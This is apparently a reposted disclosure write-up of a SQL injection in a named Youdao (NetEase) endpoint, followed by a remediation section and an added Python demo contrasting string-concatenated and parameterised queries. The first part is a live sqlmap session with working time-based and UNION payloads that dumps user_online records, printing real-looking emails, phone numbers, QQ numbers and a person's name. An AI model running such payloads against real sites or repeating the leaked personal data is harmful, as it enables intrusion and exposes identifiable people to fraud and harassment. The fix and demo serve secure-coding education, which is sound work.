SQL injection on a NetEase site exposes a million users' records
程序员文章站
2022-04-07 19:34:30
$ python sqlmap.py -u "https://f.youdao.com/file.do?method=getMajorName&subject=undefined*" --sql-shell

        sqlmap {1.0.3.9#dev}  https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 12:19:31

custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] y
[12:19:33] [INFO] resuming back-end DBMS 'mysql'
[12:19:33] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: https://f.youdao.com:80/file.do?method=getMajorName&subject=undefined' AND (SELECT * FROM (SELECT(SLEEP(5)))wyCV) AND 'UlJS'='UlJS

    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: https://f.youdao.com:80/file.do?method=getMajorName&subject=undefined' UNION ALL SELECT NULL,CONCAT(0x716a766a71,0x686f634c42577a794d7447684b6b796e51566255644e6f58714b6e527568574b4d786f536a50426d,0x7170717a71),NULL,NULL-- -
---
[12:19:33] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[12:19:33] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER
sql-shell> select count(*) from user_online
[12:20:00] [INFO] fetching SQL SELECT statement query output: 'select count(*) from user_online'
[12:20:00] [WARNING] reflective value(s) found and filtering out
select count(*) from user_online:    '1171117'
sql-shell> select * from user_online limit 10
[12:20:49] [INFO] fetching SQL SELECT statement query output: 'select * from user_online limit 10'
[12:20:49] [INFO] you did not provide the fields in your query. sqlmap will retrieve the column names itself
[12:20:49] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) columns
[12:20:49] [INFO] fetching current database
[12:20:49] [INFO] fetching columns for table 'user_online' in database 'atranslate'
[12:20:49] [INFO] the query with expanded column name(s) is: SELECT amount, createTime, email, id, info, trialAmount, username FROM user_online LIMIT 10
[12:20:49] [CRITICAL] connection dropped or unknown HTTP status code received. Try to force the HTTP User-Agent header with option '--user-agent' or switch '--random-agent'. sqlmap is going to retry the request(s)
[12:20:49] [INFO] retrieved: "0","1421038640911","[email protected]","-9223371666268699366","{\"phone\":\"13849737026\"...
[12:20:49] [INFO] retrieved: "0","1441078075986"," ","-9223365685474998611","{\"vendor\":\"write\"}","0","kuang.xiaoyan@...
[12:20:50] [INFO] retrieved: "0","1456906495294"," ","-9223339392571530192","{\"vendor\":\"read\"}","0","[email protected]..
[12:20:50] [INFO] retrieved: "0","1420706540215"," ","-9223331508831089524","{\"vendor\":\"write\"}","0","[email protected]..
[12:20:50] [INFO] retrieved: "0","1458184084774"," ","-9223323061235546606","{\"vendor\":\"weixinapp\"}","0","opWGrjrDDK...
[12:20:50] [INFO] retrieved: "0","1422687949837"," ","-9223299177461494054","{\"vendor\":\"write\"}","0","carrie_chicos@...
[12:20:50] [INFO] retrieved: "0","1433299378884"," ","-9223294631254944376","{\"vendor\":\"write\"}","0","[email protected]...
[12:20:50] [INFO] retrieved: "0","1433410028488","[email protected]","-9223283068763516084","{\"phone\":\"13924952418\",\...
[12:20:50] [INFO] retrieved: "0","1457073582194"," ","-9223281766783387951","{\"vendor\":\"write\"}","0","[email protected]...
[12:20:50] [INFO] retrieved: "0","1440489549781"," ","-9223261311899849978","{\"vendor\":\"write\"}","0","[email protected]"
select * from user_online limit 10 [10]:
[*] 0, 1421038640911, [email protected], -9223371666268699366, {\"phone\":\"13849737026\",\"bill\":null,\"nickname\":\"Bonnie\",\"vendor\":\"fanyiinput\",\"name\":\"陈秀\",\"qq\":\"792684076\"}, 0, qq_F516AC4A2C032277B0BECE2E5FA8EEF0
[*] 0, 1441078075986, , -9223365685474998611, {\"vendor\":\"write\"}, 0, [email protected]
[*] 0, 1456906495294, , -9223339392571530192, {\"vendor\":\"read\"}, 0, [email protected]
[*] 0, 1420706540215, , -9223331508831089524, {\"vendor\":\"write\"}, 0, [email protected]
[*] 0, 1458184084774, , -9223323061235546606, {\"vendor\":\"weixinapp\"}, 0, opWGrjrDDKLQ7kKG4-4KGEBlKsYs
[*] 0, 1422687949837, , -9223299177461494054, {\"vendor\":\"write\"}, 0, [email protected]
[*] 0, 1433299378884, , -9223294631254944376, {\"vendor\":\"write\"}, 0, [email protected]
[*] 0, 1433410028488, [email protected], -9223283068763516084, {\"phone\":\"13924952418\",\"nickname\":\"☆心B\/tp钟\",\"vendor\":\"connect.qq.com\"}, 0, qq_E58B42699858FC01548B79B25230D4A2
[*] 0, 1457073582194, , -9223281766783387951, {\"vendor\":\"write\"}, 0, [email protected]
[*] 0, 1440489549781, , -9223261311899849978, {\"vendor\":\"write\"}, 0, [email protected]
That is 1,171,117 users' records in user_online; the number even rolls off the tongue.
Fix:
Filter and escape the `subject` parameter, and put a WAF in front. The root cause is that `subject` is concatenated into the SQL text (the `'` in the payload closes the application's string literal and the rest is parsed as SQL), so the durable fix is to pass it as a bound parameter of a prepared statement; input validation and the WAF are defence in depth, not the fix itself.
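The pattern sqlmap exploited, as an added example that is not the page's or the site's own code: a lookup that pastes `subject` into the SQL text, next to the same lookup with a bound parameter. The `major` table, the rows and the handler names are constructed for the example; only the `user_online` column names come from the page. It runs against an in-memory SQLite database rather than MySQL, so MySQL's `CONCAT()` is written with `||` and the time-based `SLEEP` probe is not reproduced, but the UNION payload keeps the four-column shape sqlmap reported and the `-- -` tail that comments out the application's closing quote.

```python
import sqlite3


def build_db():
    """Constructed schema: the application's own lookup table plus the
    user_online table whose column names sqlmap enumerated. Rows are made up."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE major (id INTEGER, name TEXT, subject TEXT, extra TEXT);
        INSERT INTO major VALUES (1, 'Computer Science', 'cs', NULL);
        INSERT INTO major VALUES (2, 'Linguistics', 'ling', NULL);

        CREATE TABLE user_online (
            amount INTEGER, createTime INTEGER, email TEXT, id INTEGER,
            info TEXT, trialAmount INTEGER, username TEXT);
        INSERT INTO user_online VALUES
            (0, 1421038640911, 'alice@example.com', 1, '{"vendor":"write"}', 0, 'alice'),
            (0, 1441078075986, 'bob@example.com',   2, '{"vendor":"read"}',  0, 'bob');
    """)
    return conn


def get_major_name_vulnerable(conn, subject):
    """Hypothetical getMajorName handler: `subject` is spliced into the SQL
    text, so a quote in the value ends the string literal and whatever follows
    is parsed as SQL."""
    sql = ("SELECT id, name, subject, extra FROM major "
           "WHERE subject = '" + subject + "'")
    return conn.execute(sql).fetchall()


def get_major_name_fixed(conn, subject):
    """Same lookup with a bound parameter: the value travels separately from
    the statement, so the database never interprets it as SQL."""
    sql = "SELECT id, name, subject, extra FROM major WHERE subject = ?"
    return conn.execute(sql, (subject,)).fetchall()


# Four columns to match the application's SELECT; "-- -" swallows the
# closing quote the handler appends. SQLite's || stands in for MySQL CONCAT().
UNION_PAYLOAD = ("undefined' UNION ALL SELECT NULL, email || ':' || username, "
                 "NULL, NULL FROM user_online-- -")
COUNT_PAYLOAD = ("undefined' UNION ALL SELECT NULL, COUNT(*), NULL, NULL "
                 "FROM user_online-- -")


def dump_users_via_union(conn):
    """What the attacker reads back: column 2 of every unioned row carries
    data from a table the original query never named."""
    rows = get_major_name_vulnerable(conn, UNION_PAYLOAD)
    return [row[1] for row in rows]


def count_users_via_union(conn):
    """Mirror of the page's `select count(*) from user_online`, pulled through
    the UNION point instead of sqlmap's sql-shell."""
    rows = get_major_name_vulnerable(conn, COUNT_PAYLOAD)
    return rows[0][1]


if __name__ == "__main__":
    db = build_db()
    print("normal lookup:", get_major_name_fixed(db, "cs"))
    print("vulnerable handler leaks:", dump_users_via_union(db))
    print("user_online rows via UNION:", count_users_via_union(db))
    print("fixed handler, same payload:", get_major_name_fixed(db, UNION_PAYLOAD))
```

With the bound parameter the whole payload is compared as a literal subject name, matches nothing, and returns an empty result; escaping alone would block this particular quote-based payload but not a numeric or second-order variant, which is why the parameter binding, not the escaping, is the fix.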